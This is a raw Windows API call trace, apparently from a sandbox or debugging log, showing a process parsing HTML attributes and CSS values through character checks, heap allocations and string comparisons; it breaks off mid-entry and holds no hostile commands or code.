IsCharSpaceW (wch=0x38) returned 0 [0160.069] IsCharSpaceW (wch=0x74) returned 0 [0160.069] IsCharSpaceW (wch=0x38) returned 0 [0160.069] IsCharSpaceW (wch=0x70) returned 0 [0160.069] IsCharSpaceW (wch=0x74) returned 0 [0160.069] IsCharSpaceW (wch=0x0) returned 0 [0160.070] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.070] IsCharSpaceW (wch=0x3a) returned 0 [0160.070] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.070] IsCharSpaceW (wch=0x20) returned 1 [0160.070] IsCharSpaceW (wch=0x31) returned 0 [0160.070] IsCharAlphaNumericW (ch=0x31) returned 1 [0160.070] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.070] IsCharSpaceW (wch=0x3b) returned 0 [0160.070] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.070] IsCharSpaceW (wch=0x6d) returned 0 [0160.070] IsCharSpaceW (wch=0x31) returned 0 [0160.070] IsCharSpaceW (wch=0x31) returned 0 [0160.070] IsCharSpaceW (wch=0x6d) returned 0 [0160.070] IsCharSpaceW (wch=0x31) returned 0 [0160.070] IsCharSpaceW (wch=0x65) returned 0 [0160.070] IsCharSpaceW (wch=0x6d) returned 0 [0160.070] IsCharSpaceW (wch=0x0) returned 0 [0160.070] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.070] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c60 [0160.071] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.071] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dcb40 [0160.071] StrChrW (lpStart="border", wMatch=0x3a) returned 0x0 [0160.071] IsCharSpaceW (wch=0x30) returned 0 [0160.071] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.071] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.071] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.072] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.072] StrChrW (lpStart="valign", wMatch=0x3a) returned 0x0 [0160.072] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.072] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.072] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.073] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.073] StrChrW (lpStart="nowrap", wMatch=0x3a) returned 0x0 [0160.073] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.073] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.073] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.073] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3b38 [0160.074] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.074] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.074] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.074] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.074] memcpy_s (in: _Destination=0x6c5d0a, _DestinationSize=0x1f56, _Source=0x9ee5c94, _SourceSize=0xa | out: _Destination=0x6c5d0a) returned 0x0 [0160.075] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.076] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.076] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x22) returned 0x6d8398 [0160.076] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.076] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.076] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.076] malloc (_Size=0xec) returned 0x8ce988 [0160.077] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.077] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.077] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.077] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3c50 [0160.077] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.077] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.078] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.078] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.078] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0160.078] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.079] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.079] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.079] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.079] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0160.079] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0160.080] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0160.080] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0160.080] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6c10 [0160.081] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.081] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0160.082] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x197750, cbHash=0x2 | out: pbHash=0x197750) returned 0x0 [0160.082] HashData (in: pbData=0x19774c, cbData=0x4, pbHash=0x197758, cbHash=0x2 | out: pbHash=0x197758) returned 0x0 [0160.082] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x197754, cbHash=0x2 | out: pbHash=0x197754) returned 0x0 [0160.082] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0160.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0160.082] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x197750, cbHash=0x2 | out: pbHash=0x197750) returned 0x0 [0160.082] HashData (in: pbData=0x19774c, cbData=0x4, pbHash=0x197758, cbHash=0x2 | out: pbHash=0x197758) returned 0x0 [0160.082] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x197754, cbHash=0x2 | out: pbHash=0x197754) returned 0x0 [0160.082] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0160.082] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.082] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.082] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.083] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c10 | out: hHeap=0x5e0000) returned 1 [0160.083] GetSysColor (nIndex=15) returned 0xf0f0f0 [0160.083] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0160.083] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0160.083] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0160.083] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0160.083] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0160.083] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0160.084] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0160.084] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0160.084] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0160.084] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.084] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6cc0 [0160.084] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.085] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.085] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0160.085] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x197af0, cbHash=0x2 | out: pbHash=0x197af0) returned 0x0 [0160.085] HashData (in: pbData=0x197aec, cbData=0x4, pbHash=0x197af8, cbHash=0x2 | out: pbHash=0x197af8) returned 0x0 [0160.085] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x197af4, cbHash=0x2 | out: pbHash=0x197af4) returned 0x0 [0160.085] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0160.085] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0160.085] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x197af0, cbHash=0x2 | out: pbHash=0x197af0) returned 0x0 [0160.085] HashData (in: pbData=0x197aec, cbData=0x4, pbHash=0x197af8, cbHash=0x2 | out: pbHash=0x197af8) returned 0x0 [0160.085] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x197af4, cbHash=0x2 | out: pbHash=0x197af4) returned 0x0 [0160.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0160.086] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.086] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.086] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0160.087] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.087] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.088] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.088] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.088] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.090] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] StrChrW (lpStart="valign", wMatch=0x3a) returned 0x0 [0160.091] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.091] StrChrW (lpStart="nowrap", wMatch=0x3a) returned 0x0 [0160.092] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.092] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.092] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.092] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3c78 [0160.092] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.092] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.092] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.092] memcpy_s (in: _Destination=0x6c5d2e, _DestinationSize=0x1f32, _Source=0x9ee5da8, _SourceSize=0xa | out: _Destination=0x6c5d2e) returned 0x0 [0160.093] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.093] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.093] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2c) returned 0x6ced40 [0160.094] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.094] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.094] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.094] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.094] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.095] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.095] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x26) returned 0x6d8188 [0160.095] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.095] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.095] malloc (_Size=0x114) returned 0xc51848 [0160.095] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.098] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.098] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.099] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.099] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.100] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.101] StrChrW (lpStart="valign", wMatch=0x3a) returned 0x0 [0160.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.102] StrChrW (lpStart="nowrap", wMatch=0x3a) returned 0x0 [0160.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.102] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.102] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3db8 [0160.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.102] memcpy_s (in: _Destination=0x6c5d52, _DestinationSize=0x1f0e, _Source=0x9ee5ed2, _SourceSize=0xc | out: _Destination=0x6c5d52) returned 0x0 [0160.103] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.103] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.103] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d7fa8 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.104] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.105] IsCharSpaceW (wch=0x62) returned 0 [0160.105] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.105] IsCharSpaceW (wch=0x3a) returned 0 [0160.105] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.105] IsCharSpaceW (wch=0x20) returned 1 [0160.105] IsCharSpaceW (wch=0x74) returned 0 [0160.105] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.105] IsCharSpaceW (wch=0x3b) returned 0 [0160.105] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.105] IsCharSpaceW (wch=0xd) returned 1 [0160.105] IsCharSpaceW (wch=0xa) returned 1 [0160.105] IsCharSpaceW (wch=0x66) returned 0 [0160.105] IsCharSpaceW (wch=0x65) returned 0 [0160.105] IsCharSpaceW (wch=0x74) returned 0 [0160.105] IsCharSpaceW (wch=0x74) returned 0 [0160.105] IsCharSpaceW (wch=0x65) returned 0 [0160.106] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.106] IsCharSpaceW (wch=0x74) returned 0 [0160.106] IsCharSpaceW (wch=0x68) returned 0 [0160.106] IsCharSpaceW (wch=0x72) returned 0 [0160.106] IsCharSpaceW (wch=0x65) returned 0 [0160.106] IsCharSpaceW (wch=0x65) returned 0 [0160.106] IsCharSpaceW (wch=0x64) returned 0 [0160.106] IsCharSpaceW (wch=0x66) returned 0 [0160.106] IsCharSpaceW (wch=0x61) returned 0 [0160.106] IsCharSpaceW (wch=0x63) returned 0 [0160.106] IsCharSpaceW (wch=0x65) returned 0 [0160.106] IsCharSpaceW (wch=0x68) returned 0 [0160.106] IsCharSpaceW (wch=0x72) returned 0 [0160.106] IsCharSpaceW (wch=0x65) returned 0 [0160.106] IsCharSpaceW (wch=0x65) returned 0 [0160.106] IsCharSpaceW (wch=0x64) returned 0 [0160.106] IsCharSpaceW (wch=0x66) returned 0 [0160.106] IsCharSpaceW (wch=0x61) returned 0 [0160.106] IsCharSpaceW (wch=0x63) returned 0 [0160.106] IsCharSpaceW (wch=0x65) returned 0 [0160.106] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0160.106] _wcsnicmp (_String1="threedface", _String2="lightgrey", _MaxCount=0xa) returned 8 [0160.106] _wcsnicmp (_String1="threedface", _String2="paleturquo", _MaxCount=0xa) returned 4 [0160.106] _wcsnicmp (_String1="threedface", _String2="silver", _MaxCount=0xa) returned 1 [0160.106] _wcsnicmp (_String1="threedface", _String2="teal", _MaxCount=0xa) returned 3 [0160.107] _wcsnicmp (_String1="threedface", _String2="wheat", _MaxCount=0xa) returned -3 [0160.107] _wcsnicmp (_String1="threedface", _String2="tomato", _MaxCount=0xa) returned -7 [0160.107] _wcsnicmp (_String1="threedface", _String2="thistle", _MaxCount=0xa) returned 9 [0160.107] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81ea70 [0160.107] _wcsnicmp (_String1="threedface", _String2="inactiveca", _MaxCount=0xa) returned 11 [0160.107] _wcsnicmp (_String1="threedface", _String2="threeddark", _MaxCount=0xa) returned 2 [0160.107] _wcsnicmp (_String1="threedface", _String2="threedshad", _MaxCount=0xa) returned -13 [0160.107] _wcsnicmp (_String1="threedface", _String2="threedhigh", _MaxCount=0xa) returned -2 [0160.107] _wcsnicmp (_String1="threedface", _String2="threedface", _MaxCount=0xa) returned 0 [0160.107] IsCharSpaceW (wch=0x0) returned 0 [0160.107] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0160.107] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6d40 [0160.108] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.108] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.108] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.108] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.108] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.108] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dc940 [0160.108] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.108] IsCharSpaceW (wch=0x3a) returned 0 [0160.108] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.108] IsCharSpaceW (wch=0x20) returned 1 [0160.108] IsCharSpaceW (wch=0x6d) returned 0 [0160.108] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.109] IsCharSpaceW (wch=0x20) returned 1 [0160.109] IsCharSpaceW (wch=0x73) returned 0 [0160.109] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.109] IsCharSpaceW (wch=0x20) returned 1 [0160.109] IsCharSpaceW (wch=0x73) returned 0 [0160.109] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.109] IsCharSpaceW (wch=0x3b) returned 0 [0160.180] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.180] IsCharSpaceW (wch=0x20) returned 1 [0160.180] IsCharSpaceW (wch=0x66) returned 0 [0160.180] IsCharSpaceW (wch=0x66) returned 0 [0160.180] IsCharSpaceW (wch=0x6d) returned 0 [0160.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3ea8 [0160.181] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.181] IsCharSpaceW (wch=0x3a) returned 0 [0160.181] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.181] IsCharSpaceW (wch=0x20) returned 1 [0160.181] IsCharSpaceW (wch=0x38) returned 0 [0160.181] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.181] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.181] IsCharSpaceW (wch=0x3b) returned 0 [0160.181] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.181] IsCharSpaceW (wch=0x20) returned 1 [0160.181] IsCharSpaceW (wch=0x77) returned 0 [0160.181] IsCharSpaceW (wch=0x74) returned 0 [0160.181] IsCharSpaceW (wch=0x38) returned 0 [0160.181] IsCharSpaceW (wch=0x38) returned 0 [0160.181] IsCharSpaceW (wch=0x74) returned 0 [0160.181] IsCharSpaceW (wch=0x38) returned 0 [0160.181] IsCharSpaceW (wch=0x70) returned 0 [0160.181] IsCharSpaceW (wch=0x74) returned 0 [0160.181] IsCharSpaceW (wch=0x0) returned 0 [0160.181] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.181] IsCharSpaceW (wch=0x3a) returned 0 [0160.181] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.182] IsCharSpaceW (wch=0x20) returned 1 [0160.182] IsCharSpaceW (wch=0x33) returned 0 [0160.182] IsCharAlphaNumericW (ch=0x33) returned 1 [0160.182] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.182] IsCharSpaceW (wch=0x3b) returned 0 [0160.182] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.182] IsCharSpaceW (wch=0x6d) returned 0 [0160.182] IsCharSpaceW (wch=0x33) returned 0 [0160.182] IsCharSpaceW (wch=0x33) returned 0 [0160.182] IsCharSpaceW (wch=0x6d) returned 0 [0160.182] IsCharSpaceW (wch=0x33) returned 0 [0160.182] IsCharSpaceW (wch=0x65) returned 0 [0160.182] IsCharSpaceW (wch=0x6d) returned 0 [0160.182] IsCharSpaceW (wch=0x0) returned 0 [0160.182] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.182] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d90 [0160.182] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x9ef3e30 [0160.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.184] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.185] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.185] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.185] StrChrW (lpStart="valign", wMatch=0x3a) returned 0x0 [0160.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.187] StrChrW (lpStart="nowrap", wMatch=0x3a) returned 0x0 [0160.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.187] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3ed0 [0160.191] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.191] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.191] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.191] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.191] memcpy_s (in: _Destination=0x6c5d78, _DestinationSize=0x1ee8, _Source=0x9ee609c, _SourceSize=0xa | out: _Destination=0x6c5d78) returned 0x0 [0160.193] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.193] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.193] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x22) returned 0x6d8098 [0160.193] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.193] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.193] RtlTryEnterCriticalSection 